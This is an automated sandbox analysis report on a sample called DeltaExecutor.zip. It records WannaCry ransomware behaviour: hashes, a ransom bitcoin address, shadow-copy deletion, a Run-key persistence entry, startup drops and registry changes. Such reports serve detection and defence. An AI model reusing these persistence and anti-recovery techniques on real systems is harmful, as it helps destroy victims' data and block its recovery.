Resubmissions
01-01-2025 20:08
250101-yw3eystrcl 801-01-2025 20:04
250101-ytbt8a1qe1 801-01-2025 20:01
250101-yrhvra1pgx 801-01-2025 14:10
250101-rgpf8axnaw 10Analysis
-
max time kernel
740s -
max time network
742s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-01-2025 14:10
Static task
static1
Behavioral task
behavioral1
Sample
DeltaExecutor.zip
Resource
win10v2004-20241007-en
Errors
General
-
Target
DeltaExecutor.zip
-
Size
8.7MB
-
MD5
0fe9527ce6a6464c8417949dca101972
-
SHA1
92e3d746ef23e80ecdee68910b64030bddaa7a9a
-
SHA256
d9029d87aae61f32f6ea1f9bace4b63671b89d07ff8173e376d4054078c19669
-
SHA512
39914909702417bfae6e411d2c59acc294961e8a722a87862301f997dcf3ae3a535681045b68e5b79bd970bdae428ca5c1aa33c5115195a919622e6265c6163d
-
SSDEEP
196608:E0kiwudGHZV4uYmFg7zf2yEC3axVsqFckd1/r81uMRZKI81oeI:EGA56u1G7wCKLzd1/rORZKId
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
wannacry
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 4616 created 6040 4616 taskmgr.exe 226 PID 4616 created 6040 4616 taskmgr.exe 226 -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Wannacry family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
pid Process 1936 powershell.exe 5992 powershell.exe 1688 powershell.exe 1936 powershell.exe 5992 powershell.exe 1688 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8A5C.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD8A72.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 33 IoCs
pid Process 2812 DeltaExecutor.exe 5328 EzExtractSetup.exe 5712 EzExtractSetup.exe 5176 EzExtractProApp.exe 5776 DeltaExecutor.exe 3680 DeltaExecutor.exe 3472 DeltaExecutor.exe 3624 taskdl.exe 4792 @[email protected] 2688 @[email protected] 3948 taskhsvc.exe 6040 @[email protected] 832 taskdl.exe 5756 taskse.exe 4288 @[email protected] 5544 taskdl.exe 348 taskse.exe 4488 @[email protected] 2164 taskse.exe 4140 taskdl.exe 5936 @[email protected] 2000 taskse.exe 1904 @[email protected] 3216 taskdl.exe 5972 taskse.exe 3884 @[email protected] 5284 taskdl.exe 3916 taskse.exe 4500 @[email protected] 1432 taskdl.exe 224 taskse.exe 1448 @[email protected] 632 taskdl.exe -
Loads dropped DLL 64 IoCs
pid Process 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 2812 DeltaExecutor.exe 5328 EzExtractSetup.exe 5328 EzExtractSetup.exe 5328 EzExtractSetup.exe 5328 EzExtractSetup.exe 5328 EzExtractSetup.exe 5328 EzExtractSetup.exe 5328 EzExtractSetup.exe 5712 EzExtractSetup.exe 5712 EzExtractSetup.exe 5328 EzExtractSetup.exe 5712 EzExtractSetup.exe 5712 EzExtractSetup.exe 6044 regsvr32.exe 6060 regsvr32.exe 6096 regsvr32.exe 5328 EzExtractSetup.exe 5176 EzExtractProApp.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 5776 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3680 DeltaExecutor.exe 3472 DeltaExecutor.exe 3472 DeltaExecutor.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4768 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ovmsvvcyf828 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\"" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\7-Zip\Lang\he.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\fur.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\descript.ion msiexec.exe File created C:\Program Files\7-Zip\Lang\th.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\va.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\gl.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\ku-ckb.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\pl.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\hy.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt msiexec.exe File created C:\Program Files\7-Zip\License.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\co.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\ka.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\az.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\el.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\ne.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\History.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt msiexec.exe File created C:\Program Files\7-Zip\readme.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\et.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\hr.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\ast.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\hi.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt msiexec.exe File created C:\Program Files\7-Zip\History.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt msiexec.exe File opened for modification C:\Program Files\7-Zip\Lang\fy.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\ku.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\mk.txt msiexec.exe File created C:\Program Files\7-Zip\Lang\nn.txt msiexec.exe -
Drops file in Windows directory 26 IoCs
description ioc Process File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zip32.dll msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zip.dll msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zip.dll msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zG.exe msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7z.dll msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7z.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI8A21.tmp msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zFM.exe msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7z.exe msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7z.dll msiexec.exe File opened for modification C:\Windows\Installer\e5a8927.msi msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zip32.dll msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zFM.exe msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7z.sfx msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zCon.sfx msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zCon.sfx msiexec.exe File created C:\Windows\Installer\e5a8927.msi msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0 msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{23170F69-40C1-2702-2201-000001000000} msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7zG.exe msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\96F071321C0420722210000010000000\22.1.0\_7z.sfx msiexec.exe File created C:\Windows\Installer\e5a8975.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EzExtractSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhsvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EzExtractSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe -
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e3c1c56297b3270b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e3c1c5620000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e3c1c562000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de3c1c562000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e3c1c56200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 20 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133802145117089707" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "226" LogonUI.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7}\InProcServer32\ = "C:\\Program Files (x86)\\EzExtractPro\\EzExtractProShell32.dll" regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.arj\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zipx\shellex regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} EzExtractProApp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0420722210000010000000\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.xz\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zst\shellex regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ EzExtractProApp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0420722210000010000000\SourceList\PackageName = "7z2201-x64 (1).msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0420722210000010000000\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ = "EzExtractPro Context Menu Handler" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7}\InProcServer32\ = "C:\\Program Files (x86)\\EzExtractPro\\EzExtractProShell.dll" regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.cab\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.iso\shellex regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zst 